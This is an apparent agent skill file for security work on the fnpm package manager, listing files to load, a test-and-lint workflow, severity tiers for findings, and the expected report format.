SKILL: fnpm-security
When to use this skill
Use it when a task touches security: auditing, AST analysis, install scripts, transitive dependencies, or risky package blocking.
Minimum context to load
- •
docs/SECURITY.md - •
docs/TRANSITIVE_SECURITY.md - •
src/security.rs - •
src/ast_security_analyzer.rs - •Tests in
tests/security_tests.rs
Recommended sequence
- •Identify the risk surface (scripts, dynamic code, network, filesystem).
- •Validate that detection does not create obvious false positives.
- •Add or update security tests.
- •Run focused validation:
- •
cargo test --test security_tests --all-features
- •
- •Run the full baseline:
- •
make fmt - •
make clippy - •
make test
- •
Severity criteria
- •Critical: arbitrary execution, credential exfiltration, strong evasion patterns.
- •High: untrusted command/shell execution, remote download and execution.
- •Medium: suspicious patterns without direct exploitation evidence.
- •Low: potential risks with clear mitigations.
Expected output
- •Findings prioritized by severity.
- •Technical evidence (file and line).
- •Concrete mitigation recommendation.